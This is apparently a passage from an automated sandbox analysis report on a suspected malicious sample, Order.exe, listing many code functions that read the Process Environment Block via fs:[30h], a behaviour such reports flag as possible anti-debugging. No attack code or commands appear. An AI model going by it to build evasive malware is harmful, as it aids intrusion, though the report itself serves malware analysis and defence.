                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019FA250 mov eax, dword ptr fs:[00000030h]5_2_019FA250
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019FA250 mov eax, dword ptr fs:[00000030h]5_2_019FA250
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C8243 mov eax, dword ptr fs:[00000030h]5_2_019C8243
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C8243 mov ecx, dword ptr fs:[00000030h]5_2_019C8243
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F0274 mov eax, dword ptr fs:[00000030h]5_2_019F0274
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F0274 mov eax, dword ptr fs:[00000030h]5_2_019F0274
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F0274 mov eax, dword ptr fs:[00000030h]5_2_019F0274
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F0274 mov eax, dword ptr fs:[00000030h]5_2_019F0274
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F0274 mov eax, dword ptr fs:[00000030h]5_2_019F0274
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F0274 mov eax, dword ptr fs:[00000030h]5_2_019F0274
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F0274 mov eax, dword ptr fs:[00000030h]5_2_019F0274
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F0274 mov eax, dword ptr fs:[00000030h]5_2_019F0274
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F0274 mov eax, dword ptr fs:[00000030h]5_2_019F0274
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F0274 mov eax, dword ptr fs:[00000030h]5_2_019F0274
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F0274 mov eax, dword ptr fs:[00000030h]5_2_019F0274
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F0274 mov eax, dword ptr fs:[00000030h]5_2_019F0274
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01944260 mov eax, dword ptr fs:[00000030h]5_2_01944260
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01944260 mov eax, dword ptr fs:[00000030h]5_2_01944260
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01944260 mov eax, dword ptr fs:[00000030h]5_2_01944260
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193826B mov eax, dword ptr fs:[00000030h]5_2_0193826B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A1625D mov eax, dword ptr fs:[00000030h]5_2_01A1625D
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197E59C mov eax, dword ptr fs:[00000030h]5_2_0197E59C
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01942582 mov eax, dword ptr fs:[00000030h]5_2_01942582
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01942582 mov ecx, dword ptr fs:[00000030h]5_2_01942582
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01974588 mov eax, dword ptr fs:[00000030h]5_2_01974588
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019645B1 mov eax, dword ptr fs:[00000030h]5_2_019645B1
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019645B1 mov eax, dword ptr fs:[00000030h]5_2_019645B1
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C05A7 mov eax, dword ptr fs:[00000030h]5_2_019C05A7
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C05A7 mov eax, dword ptr fs:[00000030h]5_2_019C05A7
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C05A7 mov eax, dword ptr fs:[00000030h]5_2_019C05A7
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019465D0 mov eax, dword ptr fs:[00000030h]5_2_019465D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197A5D0 mov eax, dword ptr fs:[00000030h]5_2_0197A5D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197A5D0 mov eax, dword ptr fs:[00000030h]5_2_0197A5D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197E5CF mov eax, dword ptr fs:[00000030h]5_2_0197E5CF
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197E5CF mov eax, dword ptr fs:[00000030h]5_2_0197E5CF
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196E5E7 mov eax, dword ptr fs:[00000030h]5_2_0196E5E7
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196E5E7 mov eax, dword ptr fs:[00000030h]5_2_0196E5E7
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196E5E7 mov eax, dword ptr fs:[00000030h]5_2_0196E5E7
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196E5E7 mov eax, dword ptr fs:[00000030h]5_2_0196E5E7
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196E5E7 mov eax, dword ptr fs:[00000030h]5_2_0196E5E7
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196E5E7 mov eax, dword ptr fs:[00000030h]5_2_0196E5E7
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196E5E7 mov eax, dword ptr fs:[00000030h]5_2_0196E5E7
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196E5E7 mov eax, dword ptr fs:[00000030h]5_2_0196E5E7
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019425E0 mov eax, dword ptr fs:[00000030h]5_2_019425E0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197C5ED mov eax, dword ptr fs:[00000030h]5_2_0197C5ED
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197C5ED mov eax, dword ptr fs:[00000030h]5_2_0197C5ED
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019D6500 mov eax, dword ptr fs:[00000030h]5_2_019D6500
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950535 mov eax, dword ptr fs:[00000030h]5_2_01950535
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950535 mov eax, dword ptr fs:[00000030h]5_2_01950535
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950535 mov eax, dword ptr fs:[00000030h]5_2_01950535
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950535 mov eax, dword ptr fs:[00000030h]5_2_01950535
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950535 mov eax, dword ptr fs:[00000030h]5_2_01950535
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950535 mov eax, dword ptr fs:[00000030h]5_2_01950535
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A14500 mov eax, dword ptr fs:[00000030h]5_2_01A14500
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A14500 mov eax, dword ptr fs:[00000030h]5_2_01A14500
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A14500 mov eax, dword ptr fs:[00000030h]5_2_01A14500
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A14500 mov eax, dword ptr fs:[00000030h]5_2_01A14500
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A14500 mov eax, dword ptr fs:[00000030h]5_2_01A14500
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A14500 mov eax, dword ptr fs:[00000030h]5_2_01A14500
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A14500 mov eax, dword ptr fs:[00000030h]5_2_01A14500
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196E53E mov eax, dword ptr fs:[00000030h]5_2_0196E53E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196E53E mov eax, dword ptr fs:[00000030h]5_2_0196E53E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196E53E mov eax, dword ptr fs:[00000030h]5_2_0196E53E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196E53E mov eax, dword ptr fs:[00000030h]5_2_0196E53E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196E53E mov eax, dword ptr fs:[00000030h]5_2_0196E53E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01948550 mov eax, dword ptr fs:[00000030h]5_2_01948550
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01948550 mov eax, dword ptr fs:[00000030h]5_2_01948550
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197656A mov eax, dword ptr fs:[00000030h]5_2_0197656A
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197656A mov eax, dword ptr fs:[00000030h]5_2_0197656A
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197656A mov eax, dword ptr fs:[00000030h]5_2_0197656A
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019FA49A mov eax, dword ptr fs:[00000030h]5_2_019FA49A
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019744B0 mov ecx, dword ptr fs:[00000030h]5_2_019744B0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019CA4B0 mov eax, dword ptr fs:[00000030h]5_2_019CA4B0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019464AB mov eax, dword ptr fs:[00000030h]5_2_019464AB
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019404E5 mov ecx, dword ptr fs:[00000030h]5_2_019404E5
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01978402 mov eax, dword ptr fs:[00000030h]5_2_01978402
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01978402 mov eax, dword ptr fs:[00000030h]5_2_01978402
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01978402 mov eax, dword ptr fs:[00000030h]5_2_01978402
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193E420 mov eax, dword ptr fs:[00000030h]5_2_0193E420
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193E420 mov eax, dword ptr fs:[00000030h]5_2_0193E420
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193E420 mov eax, dword ptr fs:[00000030h]5_2_0193E420
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193C427 mov eax, dword ptr fs:[00000030h]5_2_0193C427
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C6420 mov eax, dword ptr fs:[00000030h]5_2_019C6420
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C6420 mov eax, dword ptr fs:[00000030h]5_2_019C6420
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C6420 mov eax, dword ptr fs:[00000030h]5_2_019C6420
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C6420 mov eax, dword ptr fs:[00000030h]5_2_019C6420
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C6420 mov eax, dword ptr fs:[00000030h]5_2_019C6420
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C6420 mov eax, dword ptr fs:[00000030h]5_2_019C6420
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C6420 mov eax, dword ptr fs:[00000030h]5_2_019C6420
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019FA456 mov eax, dword ptr fs:[00000030h]5_2_019FA456
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196245A mov eax, dword ptr fs:[00000030h]5_2_0196245A
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193645D mov eax, dword ptr fs:[00000030h]5_2_0193645D
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197E443 mov eax, dword ptr fs:[00000030h]5_2_0197E443
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197E443 mov eax, dword ptr fs:[00000030h]5_2_0197E443
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197E443 mov eax, dword ptr fs:[00000030h]5_2_0197E443
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197E443 mov eax, dword ptr fs:[00000030h]5_2_0197E443
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197E443 mov eax, dword ptr fs:[00000030h]5_2_0197E443
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197E443 mov eax, dword ptr fs:[00000030h]5_2_0197E443
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197E443 mov eax, dword ptr fs:[00000030h]5_2_0197E443
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197E443 mov eax, dword ptr fs:[00000030h]5_2_0197E443
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196A470 mov eax, dword ptr fs:[00000030h]5_2_0196A470
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196A470 mov eax, dword ptr fs:[00000030h]5_2_0196A470
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0196A470 mov eax, dword ptr fs:[00000030h]5_2_0196A470
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019CC460 mov ecx, dword ptr fs:[00000030h]5_2_019CC460
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019E678E mov eax, dword ptr fs:[00000030h]5_2_019E678E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019407AF mov eax, dword ptr fs:[00000030h]5_2_019407AF
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019F47A0 mov eax, dword ptr fs:[00000030h]5_2_019F47A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194C7C0 mov eax, dword ptr fs:[00000030h]5_2_0194C7C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C07C3 mov eax, dword ptr fs:[00000030h]5_2_019C07C3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019447FB mov eax, dword ptr fs:[00000030h]5_2_019447FB
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019447FB mov eax, dword ptr fs:[00000030h]5_2_019447FB
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019627ED mov eax, dword ptr fs:[00000030h]5_2_019627ED
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019627ED mov eax, dword ptr fs:[00000030h]5_2_019627ED
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019627ED mov eax, dword ptr fs:[00000030h]5_2_019627ED
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019CE7E1 mov eax, dword ptr fs:[00000030h]5_2_019CE7E1
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01940710 mov eax, dword ptr fs:[00000030h]5_2_01940710
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01970710 mov eax, dword ptr fs:[00000030h]5_2_01970710
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197C700 mov eax, dword ptr fs:[00000030h]5_2_0197C700
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197273C mov eax, dword ptr fs:[00000030h]5_2_0197273C
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197273C mov ecx, dword ptr fs:[00000030h]5_2_0197273C
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197273C mov eax, dword ptr fs:[00000030h]5_2_0197273C
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BC730 mov eax, dword ptr fs:[00000030h]5_2_019BC730
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197C720 mov eax, dword ptr fs:[00000030h]5_2_0197C720
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197C720 mov eax, dword ptr fs:[00000030h]5_2_0197C720
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019CE75D mov eax, dword ptr fs:[00000030h]5_2_019CE75D
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01940750 mov eax, dword ptr fs:[00000030h]5_2_01940750
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982750 mov eax, dword ptr fs:[00000030h]5_2_01982750
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982750 mov eax, dword ptr fs:[00000030h]5_2_01982750
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C4755 mov eax, dword ptr fs:[00000030h]5_2_019C4755
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197674D mov esi, dword ptr fs:[00000030h]5_2_0197674D
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197674D mov eax, dword ptr fs:[00000030h]5_2_0197674D
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197674D mov eax, dword ptr fs:[00000030h]5_2_0197674D
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01948770 mov eax, dword ptr fs:[00000030h]5_2_01948770
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950770 mov eax, dword ptr fs:[00000030h]5_2_01950770
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950770 mov eax, dword ptr fs:[00000030h]5_2_01950770
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950770 mov eax, dword ptr fs:[00000030h]5_2_01950770
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950770 mov eax, dword ptr fs:[00000030h]5_2_01950770
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950770 mov eax, dword ptr fs:[00000030h]5_2_01950770
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950770 mov eax, dword ptr fs:[00000030h]5_2_01950770
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950770 mov eax, dword ptr fs:[00000030h]5_2_01950770
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950770 mov eax, dword ptr fs:[00000030h]5_2_01950770
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950770 mov eax, dword ptr fs:[00000030h]5_2_01950770
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950770 mov eax, dword ptr fs:[00000030h]5_2_01950770
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950770 mov eax, dword ptr fs:[00000030h]5_2_01950770
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01950770 mov eax, dword ptr fs:[00000030h]5_2_01950770
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01944690 mov eax, dword ptr fs:[00000030h]5_2_01944690
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01944690 mov eax, dword ptr fs:[00000030h]5_2_01944690
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019766B0 mov eax, dword ptr fs:[00000030h]5_2_019766B0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197C6A6 mov eax, dword ptr fs:[00000030h]5_2_0197C6A6
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0197A6C7
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197A6C7 mov eax, dword ptr fs:[00000030h]5_2_0197A6C7
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BE6F2 mov eax, dword ptr fs:[00000030h]5_2_019BE6F2
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BE6F2 mov eax, dword ptr fs:[00000030h]5_2_019BE6F2
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BE6F2 mov eax, dword ptr fs:[00000030h]5_2_019BE6F2
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BE6F2 mov eax, dword ptr fs:[00000030h]5_2_019BE6F2
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C06F1 mov eax, dword ptr fs:[00000030h]5_2_019C06F1
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C06F1 mov eax, dword ptr fs:[00000030h]5_2_019C06F1
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982619 mov eax, dword ptr fs:[00000030h]5_2_01982619
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019BE609 mov eax, dword ptr fs:[00000030h]5_2_019BE609
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195260B mov eax, dword ptr fs:[00000030h]5_2_0195260B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195260B mov eax, dword ptr fs:[00000030h]5_2_0195260B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195260B mov eax, dword ptr fs:[00000030h]5_2_0195260B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195260B mov eax, dword ptr fs:[00000030h]5_2_0195260B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195260B mov eax, dword ptr fs:[00000030h]5_2_0195260B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195260B mov eax, dword ptr fs:[00000030h]5_2_0195260B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195260B mov eax, dword ptr fs:[00000030h]5_2_0195260B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195E627 mov eax, dword ptr fs:[00000030h]5_2_0195E627
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01976620 mov eax, dword ptr fs:[00000030h]5_2_01976620
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01978620 mov eax, dword ptr fs:[00000030h]5_2_01978620
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194262C mov eax, dword ptr fs:[00000030h]5_2_0194262C
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0866E mov eax, dword ptr fs:[00000030h]5_2_01A0866E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A0866E mov eax, dword ptr fs:[00000030h]5_2_01A0866E
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0195C640 mov eax, dword ptr fs:[00000030h]5_2_0195C640
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01972674 mov eax, dword ptr fs:[00000030h]5_2_01972674
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197A660 mov eax, dword ptr fs:[00000030h]5_2_0197A660
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0197A660 mov eax, dword ptr fs:[00000030h]5_2_0197A660
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C89B3 mov esi, dword ptr fs:[00000030h]5_2_019C89B3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C89B3 mov eax, dword ptr fs:[00000030h]5_2_019C89B3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019C89B3 mov eax, dword ptr fs:[00000030h]5_2_019C89B3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019529A0 mov eax, dword ptr fs:[00000030h]5_2_019529A0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019409AD mov eax, dword ptr fs:[00000030h]5_2_019409AD
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019409AD mov eax, dword ptr fs:[00000030h]5_2_019409AD
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A9D0 mov eax, dword ptr fs:[00000030h]5_2_0194A9D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A9D0 mov eax, dword ptr fs:[00000030h]5_2_0194A9D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A9D0 mov eax, dword ptr fs:[00000030h]5_2_0194A9D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A9D0 mov eax, dword ptr fs:[00000030h]5_2_0194A9D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A9D0 mov eax, dword ptr fs:[00000030h]5_2_0194A9D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A9D0 mov eax, dword ptr fs:[00000030h]5_2_0194A9D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019749D0 mov eax, dword ptr fs:[00000030h]5_2_019749D0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019D69C0 mov eax, dword ptr fs:[00000030h]5_2_019D69C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019729F9 mov eax, dword ptr fs:[00000030h]5_2_019729F9
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019729F9 mov eax, dword ptr fs:[00000030h]5_2_019729F9
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01A0A9D3 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019CE9E0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01938918 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01938918 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019CC912 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019BE908 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019BE908 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019C892A mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019D892B mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019C0946 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019CC97C mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01A14940 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019E4978 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019E4978 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01966962 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01966962 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01966962 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0198096E mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0198096E mov edx, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0198096E mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019CC89D mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01940887 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01A0A8E4 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0196E8C0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01A108C0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0197C8F9 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_0197C8F9 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_019CC810 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Order.exe | Code function: 5_2_01962835 mov eax, dword ptr fs:[00000030h]
